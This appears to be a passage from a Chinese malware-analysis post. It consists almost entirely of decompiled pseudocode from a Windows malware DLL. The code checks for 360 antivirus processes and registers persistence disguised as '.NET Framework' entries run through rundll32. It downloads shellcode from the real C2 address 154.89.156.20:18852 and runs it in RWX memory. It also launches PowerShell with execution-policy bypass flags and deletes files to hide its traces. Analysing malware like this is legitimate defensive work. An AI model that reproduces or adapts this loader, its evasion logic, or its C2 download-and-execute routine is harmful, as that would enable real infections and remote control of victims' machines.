goto LABEL_4;
CloseHandle(MutexA);
while ( 1 )
{
_loaddll(0);
LABEL_4:
v29 = 1408247324;
v30 = -1641597937;
v31 = -1827626421;
v32 = 17327;
v2 = (_DWORD *)unknown_libname_4(&v29, &v33);
sub_10002DC5(*v2, v2[1], &v24);
v3 = sub_10007E62(v24, v25);
v4 = sub_10003910(v3);
v5 = sub_10001B04(v41);
v27 = 3;
v6 = sub_1000430B(v5, v4);
v38 = 1;
if ( !v6 )
goto LABEL_7;
v33 = 1408247356;
v34 = -1641597937;
v35 = -1827626421;
v36 = 17327;
v7 = (_DWORD *)unknown_libname_4(&v33, v37);
sub_10002DC5(*v7, v7[1], &v24);
v8 = sub_10007E62(v24, v25);
v9 = sub_10003910(v8);
v10 = sub_10001B04(v39);
v27 = 15;
if ( (unsigned __int8)sub_1000430B(v10, v9) )
{
v28 = 1;
v11 = 15;
}
else
{
LABEL_7:
v11 = v27;
v28 = 0;
if ( (v27 & 8) == 0 )
goto LABEL_9;
}
v27 = v11 & 0xFFFFFFF7;
sub_10003958(v39);
v11 = v27;
LABEL_9:
if ( (v11 & 4) != 0 )
{
v27 = v11 & 0xFFFFFFFB;
sub_10003958(v40);
}
sub_10003958(v41);
v27 &= 0xFFFFFFFC;
sub_10003958(v42);
if ( v28 )
{
v33 = 1157183004;
v34 = -1641600491;
v35 = -1827626421;
v36 = 17327;
v12 = (_DWORD *)unknown_libname_4(&v33, v37);
sub_10002DC5(*v12, v12[1], &v24);
v13 = sub_10007E62(v24, v25);
v14 = sub_10003910(v13);
v27 |= 0x30u;
v15 = v14;
v16 = sub_10001B04(v40);
if ( !(unsigned __int8)sub_1000430B(v16, v15) )
goto LABEL_14;
v29 = 1157183036;
v30 = -1641600491;
v31 = -1827626421;
v32 = 17327;
v17 = (_DWORD *)unknown_libname_4(&v29, &v33);
sub_10002DC5(*v17, v17[1], &v24);
v18 = sub_10007E62(v24, v25);
v19 = sub_10003910(v18);
v27 |= 0xC0u;
v20 = v19;
v21 = sub_10001B04(v42);
if ( !(unsigned __int8)sub_1000430B(v21, v20) )
LABEL_14:
LOBYTE(v38) = 0;
v22 = v27;
if ( (v27 & 0x80u) != 0 )
{
sub_10003958(v42);
v22 = v27;
}
if ( (v22 & 0x40) != 0 )
sub_10003958(v41);
sub_10003958(v40);
sub_10003958(v39);
if ( (_BYTE)v38 )
sub_100019A1();
}
CreateThread(0, 0, StartAddress, 0, 0, 0);
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_10002478, 0, 0, 0);
v26 = 5000;
v23 = GetCurrentThread();
WaitForSingleObject(v23, v26);
sub_100019A1();
}
}

复制代码

DWORD __usercall StartAddress@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>)
{
int v3; // eax
int v4; // eax
unsigned int v5; // eax
void **v6; // eax
void *v7; // esi
int v8; // eax
const CHAR *v9; // eax
WCHAR *v10; // ecx
void **v11; // eax
void *v12; // esi
int v13; // eax
const CHAR *v14; // eax
int v16; // [esp-24h] [ebp-334h] BYREF
LPWSTR v17; // [esp-20h] [ebp-330h]
int v18; // [esp-1Ch] [ebp-32Ch]
int v19; // [esp-18h] [ebp-328h]
int v20; // [esp-14h] [ebp-324h]
WCHAR WideCharStr[262]; // [esp+0h] [ebp-310h] BYREF
char v22[24]; // [esp+20Ch] [ebp-104h] BYREF
char v23[24]; // [esp+224h] [ebp-ECh] BYREF
LPCCH lpMultiByteStr[6]; // [esp+23Ch] [ebp-D4h] BYREF
LPCCH v25[6]; // [esp+254h] [ebp-BCh] BYREF
char v26[12]; // [esp+26Ch] [ebp-A4h] BYREF
char v27[12]; // [esp+278h] [ebp-98h] BYREF
char v28[12]; // [esp+284h] [ebp-8Ch] BYREF
char v29[12]; // [esp+290h] [ebp-80h] BYREF
int v30; // [esp+29Ch] [ebp-74h]
int v31[13]; // [esp+2A0h] [ebp-70h] BYREF
char v32; // [esp+2D4h] [ebp-3Ch]
char v33[3]; // [esp+2D5h] [ebp-3Bh] BYREF
_BYTE v34[11]; // [esp+2D8h] [ebp-38h] BYREF
char v35; // [esp+2E3h] [ebp-2Dh] BYREF
int v36; // [esp+2E4h] [ebp-2Ch]
_BYTE v37[17]; // [esp+2E8h] [ebp-28h] BYREF
char v38[3]; // [esp+2F9h] [ebp-17h] BYREF
unsigned int v39; // [esp+2FCh] [ebp-14h]
int v40; // [esp+30Ch] [ebp-4h]
*(_DWORD *)&v37[8] = a1;
v20 = a3;
v19 = a2;
qmemcpy(v34, "360tray.exe", sizeof(v34));
sub_10002DC5(v34, &v35, v34);
v40 = 0;
v36 = 1;
v30 = 1;
v3 = sub_10004BF4(v22, v27);
v40 = 1;
v39 = 3;
v30 = 3;
if ( !(unsigned __int8)sub_100023D7(v3) )
{
qmemcpy(v37, "ZhuDongFangYu.exe", sizeof(v37));
sub_10002DC5(v37, v38, v37);
v40 = 2;
v30 = 7;
v4 = sub_10004BF4(v23, v29);
v39 = 15;
if ( !(unsigned __int8)sub_100023D7(v4) )
LOBYTE(v36) = 0;
}
v5 = v39;
if ( (v39 & 8) != 0 )
{
v39 &= ~8u;
sub_10003EAC(v23);
v5 = v39;
}
if ( (v5 & 4) != 0 )
{
v39 = v5 & 0xFFFFFFFB;
sub_10002DA2(v29);
v5 = v39;
}
if ( (v5 & 2) != 0 )
{
v39 = v5 & 0xFFFFFFFD;
sub_10003EAC(v22);
LOBYTE(v5) = v39;
}
v40 = -1;
if ( (v5 & 1) != 0 )
sub_10002DA2(v27);
if ( (_BYTE)v36 )
{
sub_10004E2F(v19, v20);
sub_10005E84();
}
else
{
v31[0] = 322716279;
v31[1] = -770128304;
v31[2] = -968589238;
v31[3] = 745033722;
v31[4] = -1167213317;
v31[5] = 1927605949;
v31[6] = -1531022906;
v31[7] = -1833020679;
v31[8] = 140239199;
v31[9] = -201875851;
v31[10] = -1892210834;
v31[11] = 1496762663;
v31[12] = 6200266;
v32 = 0;
sub_10002DC5(v31, v33, &v16);
v6 = (void **)sub_10007E62(v16, v17);
v7 = v6;
v40 = 3;
if ( (unsigned int)v6[5] > 0xF )
v7 = *v6;
sub_10004C73(v22, 26);
LOBYTE(v40) = 4;
v8 = unknown_libname_7(v7);
sub_1000395D(v8);
sub_10003EAC(v22);
LOBYTE(v40) = 7;
sub_10003EAC(v23);
v9 = (const CHAR *)lpMultiByteStr;
if ( lpMultiByteStr[5] > (LPCCH)0xF )
v9 = lpMultiByteStr[0];
MultiByteToWideChar(0, 0, v9, -1, WideCharStr, 260);
sub_10001221(L".NET Framework JDAH v7.7", L"rundll32.exe", WideCharStr, v19, v20);
v17 = v10;
v16 = (int)v10;
*(_DWORD *)v37 = -738862545;
*(_DWORD *)&v37[4] = -1661833234;
*(_DWORD *)&v37[8] = -153714092;
*(_DWORD *)&v37[12] = 3685389;
v37[16] = 0;
sub_10002DC5(v37, v38, &v16);
v11 = (void **)sub_10007E62(v16, v17);
v12 = v11;
LOBYTE(v40) = 8;
if ( (unsigned int)v11[5] > 0xF )
v12 = *v11;
sub_10004C73(v26, 28);
LOBYTE(v40) = 9;
v13 = unknown_libname_7(v12);
sub_1000395D(v13);
sub_10003EAC(v26);
LOBYTE(v40) = 12;
sub_10003EAC(v28);
v18 = 260;
v17 = WideCharStr;
v16 = -1;
v14 = (const CHAR *)v25;
if ( v25[5] > (LPCCH)0xF )
v14 = v25[0];
MultiByteToWideChar(0, 0, v14, v16, v17, v18);
sub_10001221(L".NET Framework adv v6.0.4232", WideCharStr, 0, v19, v20);
sub_10003EAC(v25);
sub_10003EAC(lpMultiByteStr);
}
return 0;
}

复制代码

从C2 154.89.156.20:18852加载Shellcode并VirtualAlloc执行:

int sub_100019A1()
{
SOCKET v0; // ebx
PADDRINFOA v1; // esi
SOCKET v2; // eax
size_t v3; // esi
char *v4; // eax
SIZE_T v5; // edi
char *v6; // ebx
int v7; // eax
void *v8; // esi
struct WSAData WSAData; // [esp+10h] [ebp-1B8h] BYREF
ADDRINFOA pHints; // [esp+1A0h] [ebp-28h] BYREF
PADDRINFOA ppResult; // [esp+1C0h] [ebp-8h] BYREF
SOCKET s; // [esp+1C4h] [ebp-4h]
ppResult = 0;
v0 = -1;
s = -1;
WSAStartup(0x202u, &WSAData);
pHints.ai_flags = 0;
memset(&pHints.ai_addrlen, 0, 16);
pHints.ai_family = 2;
pHints.ai_socktype = 1;
pHints.ai_protocol = 6;
while ( 1 )
{
if ( !getaddrinfo(pNodeName, "18852", &pHints, &ppResult) )
{
v1 = ppResult;
if ( ppResult )
{
do
{
v2 = socket(v1->ai_family, v1->ai_socktype, v1->ai_protocol);
v0 = v2;
s = v2;
if ( v2 != -1 )
{
if ( connect(v2, v1->ai_addr, v1->ai_addrlen) != -1 )
break;
closesocket(v0);
v0 = -1;
s = -1;
}
v1 = v1->ai_next;
}
while ( v1 );
v1 = ppResult;
}
freeaddrinfo(v1);
if ( v0 != -1 )
break;
}
Sleep(0xBB8u);
}
v3 = 4096;
v4 = (char *)malloc(0x1000u);
v5 = 0;
LABEL_12:
v6 = v4;
while ( 1 )
{
v7 = recv(s, &v6[v5], v3 - v5, 0);
if ( v7 <= 0 )
break;
v5 += v7;
if ( v5 == v3 )
{
v3 *= 2;
v4 = (char *)realloc(v6, v3);
goto LABEL_12;
}
}
if ( v7 )
{
closesocket(s);
WSACleanup();
free(v6);
return 1;
}
else
{
closesocket(s);
WSACleanup();
v8 = VirtualAlloc(0, v5, 0x3000u, 0x40u);
memmove(v8, v6, v5);
((void (*)(void))v8)();
free(v6);
return 0;
}
}

复制代码

int __usercall sub_10004E2F@<eax>(int a1@<ecx>, int a2@<ebx>, int a3@<edi>, int a4@<esi>)
{
_DWORD *v4; // eax
void **v5; // eax
void *v6; // esi
int v7; // eax
_DWORD *v8; // eax
_DWORD *v9; // eax
_DWORD *v10; // eax
int v11; // eax
int v12; // eax
int v13; // eax
void **v14; // ecx
int v15; // eax
const CHAR *v16; // eax
LPCSTR *v17; // eax
LPCSTR *v18; // eax
void **v19; // eax
int v20; // eax
int v21; // esi
const CHAR *v22; // eax
LPCSTR *v23; // eax
void *v24; // esi
void *v25; // eax
const CHAR *v26; // eax
LPCSTR *v27; // esi
int v28; // eax
int v29; // eax
const CHAR *v30; // eax
LPCSTR *v31; // eax
LPCSTR *v32; // eax
const CHAR *v33; // eax
const CHAR *v34; // eax
int v36; // [esp-3Ch] [ebp-F94h]
int v37; // [esp-3Ch] [ebp-F94h]
int v38; // [esp-3Ch] [ebp-F94h]
int v39; // [esp-38h] [ebp-F90h]
int v40; // [esp-38h] [ebp-F90h]
int v41; // [esp-38h] [ebp-F90h]
int v42; // [esp-34h] [ebp-F8Ch]
int v43; // [esp-34h] [ebp-F8Ch]
int v44; // [esp-34h] [ebp-F8Ch]
int v45; // [esp-30h] [ebp-F88h]
int v46; // [esp-30h] [ebp-F88h]
int v47; // [esp-30h] [ebp-F88h]
int *v48; // [esp-2Ch] [ebp-F84h] BYREF
int v49; // [esp-28h] [ebp-F80h]
char *v50; // [esp-24h] [ebp-F7Ch]
_DWORD v51[8]; // [esp-20h] [ebp-F78h] BYREF
int v52[688]; // [esp+0h] [ebp-F58h] BYREF
int v53; // [esp+AC0h] [ebp-498h] BYREF
char v54[24]; // [esp+AC4h] [ebp-494h] BYREF
char v55[24]; // [esp+ADCh] [ebp-47Ch] BYREF
char v56[24]; // [esp+AF4h] [ebp-464h] BYREF
char v57[24]; // [esp+B0Ch] [ebp-44Ch] BYREF
char v58[24]; // [esp+B24h] [ebp-434h] BYREF
LPCSTR lpCmdLine[6]; // [esp+B3Ch] [ebp-41Ch] BYREF
SHELLEXECUTEINFOA pExecInfo; // [esp+B54h] [ebp-404h] BYREF
char v61[24]; // [esp+B90h] [ebp-3C8h] BYREF
char v62[24]; // [esp+BA8h] [ebp-3B0h] BYREF
char v63[24]; // [esp+BC0h] [ebp-398h] BYREF
char v64[24]; // [esp+BD8h] [ebp-380h] BYREF
char v65[24]; // [esp+BF0h] [ebp-368h] BYREF
void *v66[6]; // [esp+C08h] [ebp-350h] BYREF
void *Src[6]; // [esp+C20h] [ebp-338h] BYREF
int v68[6]; // [esp+C38h] [ebp-320h] BYREF
int v69[6]; // [esp+C50h] [ebp-308h] BYREF
int v70[6]; // [esp+C68h] [ebp-2F0h] BYREF
char v71[12]; // [esp+C80h] [ebp-2D8h] BYREF
char v72[12]; // [esp+C8Ch] [ebp-2CCh] BYREF
char v73[24]; // [esp+C98h] [ebp-2C0h] BYREF
LPCSTR lpFileName[5]; // [esp+CB0h] [ebp-2A8h] BYREF
unsigned int v75; // [esp+CC4h] [ebp-294h]
LPCSTR v76[5]; // [esp+CC8h] [ebp-290h] BYREF
unsigned int v77; // [esp+CDCh] [ebp-27Ch]
int v78[79]; // [esp+CE0h] [ebp-278h] BYREF
char v79[4]; // [esp+E1Ch] [ebp-13Ch] BYREF
_BYTE v80[81]; // [esp+E20h] [ebp-138h] BYREF
char v81[11]; // [esp+E71h] [ebp-E7h] BYREF
char v82[12]; // [esp+E7Ch] [ebp-DCh] BYREF
char v83[4]; // [esp+E88h] [ebp-D0h] BYREF
int v84; // [esp+E8Ch] [ebp-CCh] BYREF
int v85; // [esp+E90h] [ebp-C8h] BYREF
_BYTE v86[47]; // [esp+E94h] [ebp-C4h] BYREF
char v87; // [esp+EC3h] [ebp-95h] BYREF
int v88[2]; // [esp+EC4h] [ebp-94h] BYREF
int v89[6]; // [esp+ECCh] [ebp-8Ch] BYREF
char v90; // [esp+EE4h] [ebp-74h]
char v91[3]; // [esp+EE5h] [ebp-73h] BYREF
char v92[12]; // [esp+EE8h] [ebp-70h] BYREF
_BYTE v93[12]; // [esp+EF4h] [ebp-64h] BYREF
int v94[2]; // [esp+F00h] [ebp-58h] BYREF
CHAR FileName[4]; // [esp+F08h] [ebp-50h] BYREF
int v96; // [esp+F0Ch] [ebp-4Ch]
int v97; // [esp+F10h] [ebp-48h]
int v98; // [esp+F14h] [ebp-44h]
int v99; // [esp+F18h] [ebp-40h]
int v100; // [esp+F1Ch] [ebp-3Ch] BYREF
char v101; // [esp+F22h] [ebp-36h]
char v102; // [esp+F23h] [ebp-35h] BYREF
_BYTE v103[24]; // [esp+F24h] [ebp-34h] BYREF
int v104[4]; // [esp+F3Ch] [ebp-1Ch] BYREF
int v105; // [esp+F54h] [ebp-4h]
*(_DWORD *)&v103[20] = a1;
*(_DWORD *)&v103[16] = a2;
v51[2] = a2;
v51[1] = a4;
v51[0] = a3;
v104[3] = (int)v51;
v88[0] = 1342459400;
v88[1] = -1675207133;
v90 = 0;
v89[0] = -736306722;
v89[1] = -1733864832;
v89[2] = -1036698606;
v89[3] = 805651664;
v89[4] = 328732912;
v89[5] = 3074522;
sub_10002DC5(v88, v91, &v48);
v4 = (_DWORD *)sub_10007E62(v48, v49);
v105 = 0;
if ( v4[5] > 0xFu )
v4 = (_DWORD *)*v4;
sub_10003996(v66, v4);
LOBYTE(v105) = 2;
sub_10003EAC(v61);
v94[0] = 857202978;
v94[1] = 1478832801;
v101 = 0;
*(_DWORD *)FileName = -606261188;
v96 = 1455225851;
v97 = 1587389231;
v98 = -273690880;
v99 = -364046705;
strcpy((char *)&v100, "芍凕:");
sub_10002DC5(v94, &v102, &v48);
v5 = (void **)sub_10007E62(v48, v49);
v6 = v5;
LOBYTE(v105) = 3;
if ( (unsigned int)v5[5] > 0xF )
v6 = *v5;
sub_10004C73(v62, 26);
LOBYTE(v105) = 4;
v7 = unknown_libname_7(v6);
sub_1000395D(v7);
sub_10003EAC(v62);
LOBYTE(v105) = 7;
sub_10003EAC(v63);
*(_DWORD *)v103 = 1024909394;
*(_DWORD *)&v103[4] = 1344349586;
*(_DWORD *)&v103[8] = -959831765;
*(_DWORD *)&v103[12] = 1421598708;
*(_DWORD *)&v103[16] = 989627173;
*(_WORD *)&v103[20] = 0;
sub_10002DC5(v103, &v103[22], &v48);
v8 = (_DWORD *)sub_10007E62(v48, v49);
LOBYTE(v105) = 8;
if ( v8[5] > 0xFu )
v8 = (_DWORD *)*v8;
sub_100042BA(v62, v61, v8);
LOBYTE(v105) = 10;
sub_10003EAC(v64);
v78[0] = -1057044013;
v78[1] = 53854565;
v78[2] = 1424354290;
v78[3] = 1592553370;
v78[4] = -368785788;
v78[5] = -907852774;
v78[6] = -1300677933;
v78[7] = -1084290219;
v78[8] = -474724335;
v78[9] = 997789716;
v78[10] = -258581055;
v78[11] = -1833404942;
v78[12] = 759585141;
v78[13] = 69605574;
v78[14] = 2018275499;
v78[15] = -59178007;
v78[16] = -1340583082;
v78[17] = -386708047;
v78[18] = 1880823184;
v78[19] = 380173130;
v78[20] = 1209736891;
v78[21] = -877067723;
v78[22] = -1335458919;
v78[23] = 1163130830;
v78[24] = 1815776550;
v78[25] = 632179240;
v78[26] = 2040935726;
v78[27] = 863051308;
v78[28] = 1757324386;
v78[29] = 1698288373;
v78[30] = -1899173112;
v78[31] = 842243767;
v78[32] = -93640528;
v78[33] = -454809952;
v78[34] = -259695730;
v78[35] = -5703455;
v78[36] = -1880476961;
v78[37] = 1338991557;
v78[38] = -570741886;
v78[39] = -442279480;
v78[40] = 1507823518;
v78[41] = -737627727;
v78[42] = -560293445;
v78[43] = 1854427432;
v78[44] = -351033850;
v78[45] = -1701715031;
v78[46] = -835948352;
v78[47] = 2028790189;
v78[48] = 342129121;
v78[49] = -1929854752;
v78[50] = 1626384241;
v78[51] = -2093182953;
v78[52] = -990454334;
v78[53] = 1062672314;
v78[54] = 761742592;
v78[55] = -2125028747;
v78[56] = 551232118;
v78[57] = 1159355314;
v78[58] = 761587871;
v78[59] = 623591967;
v78[60] = 1905860108;
v78[61] = 657119759;
v78[62] = 1931391461;
v78[63] = -2041113452;
v78[64] = -518557417;
v78[65] = -1594532736;
v78[66] = -1710758189;
v78[67] = -1526513841;
v78[68] = -1375140697;
v78[69] = -31909772;
v78[70] = 1304528991;
v78[71] = 453986145;
v78[72] = -838921823;
v78[73] = -133488348;
v78[74] = -194300021;
v78[75] = -141437771;
v78[76] = 9489059;
v78[77] = -1743801268;
v78[78] = 21032;
sub_10002DC5(v78, v79, &v48);
v9 = (_DWORD *)sub_10007E62(v48, v49);
LOBYTE(v105) = 11;
if ( v9[5] > 0xFu )
v9 = (_DWORD *)*v9;
sub_10003996(v63, v9);
LOBYTE(v105) = 13;
sub_10003EAC(FileName);
qmemcpy(v52, &unk_1002C7F0, sizeof(v52));
sub_10002DC5(v52, &v53, &v48);
v10 = (_DWORD *)sub_10007E62(v48, v49);
LOBYTE(v105) = 14;
if ( v10[5] > 0xFu )
v10 = (_DWORD *)*v10;
sub_10003996(v64, v10);
sub_10003EAC(v73);
memset(v69, 0, 20);
v69[5] = 15;
memset(v70, 0, 20);
v70[5] = 15;
LOBYTE(v105) = 19;
v11 = sub_10004972(FileName, v63);
sub_10007305(v11);
sub_10003EAC(FileName);
v12 = sub_10004972(FileName, v64);
sub_10007305(v12);
sub_10003EAC(FileName);
v105 = 18;
sub_10004C73(Src, 28);
LOBYTE(v105) = 21;
v84 = -791622700;
v85 = -37040462;
sub_10002DC5(&v84, v86, &v84);
LOBYTE(v105) = 22;
sub_10004BF4(v54, v93);
LOBYTE(v105) = 24;
sub_10002DA2(v93);
v50 = v62;
sub_10003A05(v69);
sub_10004AB2(v36, v39, v42, v45, (int)v48, v49, v50);
LOBYTE(v105) = 25;
qmemcpy(v103, "\\PolicyManagement.xml", 21);
sub_10002DC5(v103, &v103[21], v50);
LOBYTE(v105) = 26;
v13 = sub_10004BF4(v73, v93);
LOBYTE(v105) = 27;
v14 = Src;
v50 = (char *)Src[4];
if ( Src[5] > (void *)0xF )
v14 = (void **)Src[0];
v15 = sub_10007ACB(v13, (int)v14, v14, (size_t)v50);
sub_1000395D(v15);
sub_10003EAC(v73);
LOBYTE(v105) = 30;
sub_10002DA2(v93);
v16 = (const CHAR *)lpFileName;
if ( v75 > 0xF )
v16 = lpFileName[0];
DeleteFileA(v16);
v17 = lpFileName;
if ( v75 > 0xF )
v17 = (LPCSTR *)lpFileName[0];
sub_10003996(FileName, v17);
LOBYTE(v105) = 31;
sub_10004B3F(FileName, v55);
LOBYTE(v105) = 30;
sub_10003EAC(FileName);
Sleep(0xC8u);
v18 = lpFileName;
if ( v75 > 0xF )
v18 = (LPCSTR *)lpFileName[0];
sub_10003996(FileName, v18);
LOBYTE(v105) = 32;
v84 = -1035186856;
LOWORD(v85) = -16713;
BYTE2(v85) = -74;
sub_10002DC5(&v84, (char *)&v85 + 3, &v84);
LOBYTE(v105) = 33;
sub_10004BF4(&v86[20], v72);
LOBYTE(v105) = 34;
v50 = FileName;
sub_10003A05(v70);
sub_10004AB2(v37, v40, v43, v46, (int)v48, v49, v50);
sub_10003EAC(&v86[20]);
sub_10002DA2(v72);
LOBYTE(v105) = 38;
sub_10003EAC(FileName);
v19 = v66;
if ( v66[5] > (void *)0xF )
v19 = (void **)v66[0];
sub_10003996(FileName, v19);
LOBYTE(v105) = 39;
*(_DWORD *)&v93[4] = -238104888;
*(_DWORD *)&v93[8] = -961283133;
sub_10002DC5(&v93[4], v94, &v93[4]);
LOBYTE(v105) = 40;
sub_10004BF4(v65, &v103[12]);
LOBYTE(v105) = 41;
v50 = FileName;
sub_10003A05(v58);
v20 = sub_10004AB2(v38, v41, v44, v47, (int)v48, v49, v50);
sub_10007305(v20);
sub_10003EAC(v73);
sub_10003EAC(v65);
sub_10002DA2(&v103[12]);
LOBYTE(v105) = 38;
sub_10003EAC(FileName);
v21 = sub_100042BA(v89, Src, "\");
LOBYTE(v105) = 42;
sub_10003ED5(117);
sub_1000395D(v21);
LOBYTE(v105) = 43;
sub_10003ED5(112);
sub_1000395D(FileName);
LOBYTE(v105) = 44;
sub_10003ED5(100);
sub_1000395D(v73);
LOBYTE(v105) = 45;
sub_10003ED5(97);
sub_1000395D(&v86[20]);
LOBYTE(v105) = 46;
sub_10003ED5(116);
sub_1000395D(v65);
LOBYTE(v105) = 47;
sub_10003ED5(101);
sub_1000395D(v56);
LOBYTE(v105) = 48;
sub_10003ED5(100);
sub_1000395D(v57);
LOBYTE(v105) = 49;
sub_10003ED5(46);
sub_1000395D(v82);
LOBYTE(v105) = 50;
sub_10003ED5(112);
sub_1000395D(v92);
LOBYTE(v105) = 51;
sub_10003ED5(115);
sub_1000395D(v71);
LOBYTE(v105) = 52;
sub_10003ED5(49);
sub_1000395D(v103);
sub_10003EAC(v103);
sub_10003EAC(v71);
sub_10003EAC(v92);
sub_10003EAC(v82);
sub_10003EAC(v57);
sub_10003EAC(v56);
sub_10003EAC(v65);
sub_10003EAC(&v86[20]);
sub_10003EAC(v73);
sub_10003EAC(FileName);
LOBYTE(v105) = 64;
sub_10003EAC(v89);
v22 = (const CHAR *)v76;
if ( v77 > 0xF )
v22 = v76[0];
DeleteFileA(v22);
v23 = v76;
if ( v77 > 0xF )
v23 = (LPCSTR *)v76[0];
sub_10003996(FileName, v23);
LOBYTE(v105) = 65;
sub_10004B3F(FileName, v58);
LOBYTE(v105) = 64;
sub_10003EAC(FileName);
Sleep(0xC8u);
qmemcpy(
v80,
"powershell -Com""mand "Set-Execut""ionPolicy Unrest""ricted -Scope Curre""ntUser"",
sizeof(v80));
sub_10002DC5(v80, v81, v80);
LOBYTE(v105) = 66;
v24 = (void *)sub_10004BF4(v73, v72);
LOBYTE(v105) = 67;
qmemcpy(v93, "cmd.exe /C ", 11);
sub_10002DC5(v93, &v93[11], v93);
LOBYTE(v105) = 68;
v25 = (void *)sub_10004BF4(FileName, &v103[12]);
LOBYTE(v105) = 69;
sub_10007973(v104[0], v25, v24);
sub_10003EAC(FileName);
sub_10002DA2(&v103[12]);
sub_10003EAC(v73);
LOBYTE(v105) = 74;
sub_10002DA2(v72);
v26 = (const CHAR *)lpCmdLine;
v50 = 0;
if ( lpCmdLine[5] > (LPCSTR)0xF )
v26 = lpCmdLine[0];
WinExec(v26, (UINT)v50);
Sleep(0x3E8u);
qmemcpy(v86, "powershell -Exec""utionP""olicy Byp""ass -File ", sizeof(v86));
sub_10002DC5(v86, &v87, v86);
LOBYTE(v105) = 75;
sub_10004BF4(v68, v83);
LOBYTE(v105) = 77;
sub_10002DA2(v83);
v50 = (char *)v104;
qmemcpy(v104, "/C ", 3);
v49 = (int)v104 + 3;
v48 = v104;
v27 = v76;
if ( v77 > 0xF )
v27 = (LPCSTR *)v76[0];
sub_10002DC5(v48, v49, v50);
LOBYTE(v105) = 78;
sub_10004BF4(v89, &v103[12]);
LOBYTE(v105) = 79;
v28 = sub_1000393C(v68);
sub_1000395D(v28);
LOBYTE(v105) = 80;
v29 = unknown_libname_7(v27);
sub_1000395D(v29);
sub_10007305(FileName);
sub_10003EAC(FileName);
sub_10003EAC(v73);
sub_10003EAC(v89);
LOBYTE(v105) = 77;
sub_10002DA2(&v103[12]);
pExecInfo.cbSize = 60;
memset(&pExecInfo.fMask, 0, 0x38u);
pExecInfo.fMask = 64;
pExecInfo.hwnd = 0;
v30 = (const CHAR *)v68;
pExecInfo.lpVerb = "open";
if ( v68[5] > 0xFu )
v30 = (const CHAR *)v68[0];
pExecInfo.lpParameters = v30;
pExecInfo.lpFile = "cmd.exe";
pExecInfo.lpDirectory = 0;
pExecInfo.nShow = 0;
if ( ShellExecuteExA(&pExecInfo) && pExecInfo.hProcess )
{
WaitForSingleObject(pExecInfo.hProcess, 0xFFFFFFFF);
CloseHandle(pExecInfo.hProcess);
}
v31 = lpFileName;
if ( v75 > 0xF )
v31 = (LPCSTR *)lpFileName[0];
sub_10003996(FileName, v31);
sub_10004E1A(FileName);
sub_10003EAC(FileName);
v32 = v76;
if ( v77 > 0xF )
v32 = (LPCSTR *)v76[0];
sub_10003996(FileName, v32);
sub_10004E1A(FileName);
sub_10003EAC(FileName);
v33 = (const CHAR *)lpFileName;
if ( v75 > 0xF )
v33 = lpFileName[0];
DeleteFileA(v33);
v34 = (const CHAR *)v76;
if ( v77 > 0xF )
v34 = v76[0];
DeleteFileA(v34);
sub_10003EAC(v68);
sub_10003EAC(lpCmdLine);
sub_10003EAC(v76);
sub_10003EAC(v58);
sub_10003EAC(lpFileName);
sub_10003EAC(v55);
sub_10003EAC(v54);
sub_10003EAC(Src);
sub_10003EAC(v70);
sub_10003EAC(v69);
sub_10003EAC(v64);
sub_10003EAC(v63);
sub_10003EAC(v62);
sub_10003EAC(v61);
sub_10003EAC(v66);
return 0;
}

复制代码

void __userpurge __noreturn sub_10002478(int a1@<ebx>, int a2@<edi>, int a3@<esi>, LPVOID lpThreadParameter)
{
void **v4; // eax
void *v5; // esi
int v6; // eax
int v7; // esi
_DWORD *v8; // eax
LPCSTR *i; // ecx
HANDLE v10; // eax
int v11; // esi
int v12; // eax
int v13; // esi
int v14; // esi
int v15; // eax
int v16; // esi
int v17; // esi
int v18; // eax
int v19; // esi
int v20; // esi
int v21; // eax
char v22; // al
unsigned int v23; // eax
int v24; // ecx
void **v25; // eax
void *v26; // edi
int v27; // eax
char *v28; // edx
size_t v29; // ecx
void **v30; // eax
int v31; // esi
int v32; // eax
const CHAR *v33; // eax
int v34; // [esp-24h] [ebp-25Ch] BYREF
int v35; // [esp-20h] [ebp-258h]
size_t v36; // [esp-1Ch] [ebp-254h]
int v37; // [esp-18h] [ebp-250h]
int v38; // [esp-14h] [ebp-24Ch]
int v39; // [esp+0h] [ebp-238h] BYREF
char v40[76]; // [esp+4h] [ebp-234h] BYREF
int v41; // [esp+50h] [ebp-1E8h]
char v42[72]; // [esp+68h] [ebp-1D0h] BYREF
char v43[24]; // [esp+B0h] [ebp-188h] BYREF
char v44[24]; // [esp+C8h] [ebp-170h] BYREF
char v45; // [esp+E0h] [ebp-158h] BYREF
CHAR FileName[24]; // [esp+F8h] [ebp-140h] BYREF
char v47[24]; // [esp+110h] [ebp-128h] BYREF
char v48[12]; // [esp+128h] [ebp-110h] BYREF
char v49[12]; // [esp+134h] [ebp-104h] BYREF
char v50[12]; // [esp+140h] [ebp-F8h] BYREF
char v51[12]; // [esp+14Ch] [ebp-ECh] BYREF
char v52[12]; // [esp+158h] [ebp-E0h] BYREF
LPCSTR lpCmdLine[6]; // [esp+164h] [ebp-D4h] BYREF
void *Src[4]; // [esp+17Ch] [ebp-BCh] BYREF
size_t v55; // [esp+18Ch] [ebp-ACh]
unsigned int v56; // [esp+190h] [ebp-A8h]
int v57[5]; // [esp+194h] [ebp-A4h] BYREF
__int16 v58; // [esp+1A8h] [ebp-90h]
char v59[2]; // [esp+1AAh] [ebp-8Eh] BYREF
int v60[3]; // [esp+1ACh] [ebp-8Ch] BYREF
char v61[8]; // [esp+1B8h] [ebp-80h] BYREF
int v62[4]; // [esp+1C0h] [ebp-78h] BYREF
char v63[8]; // [esp+1D0h] [ebp-68h] BYREF
int v64[3]; // [esp+1D8h] [ebp-60h] BYREF
int v65[3]; // [esp+1E4h] [ebp-54h] BYREF
int v66[3]; // [esp+1F0h] [ebp-48h] BYREF
int v67[3]; // [esp+1FCh] [ebp-3Ch] BYREF
int v68; // [esp+208h] [ebp-30h] BYREF
int v69[3]; // [esp+20Ch] [ebp-2Ch] BYREF
__int16 v70; // [esp+218h] [ebp-20h]
char v71; // [esp+21Ah] [ebp-1Eh]
char v72[4]; // [esp+21Bh] [ebp-1Dh] BYREF
char v73; // [esp+21Fh] [ebp-19h]
int v74; // [esp+220h] [ebp-18h]
unsigned int v75; // [esp+224h] [ebp-14h]
int v76; // [esp+234h] [ebp-4h]
v72[0] = HIBYTE(a1);
v38 = a3;
v37 = a2;
v74 = 0;
v71 = 0;
v68 = 863191180;
v69[0] = -1197450350;
v69[1] = 293894698;
v69[2] = -150678747;
v70 = 48;
sub_10002DC5(&v68, v72, &v34);
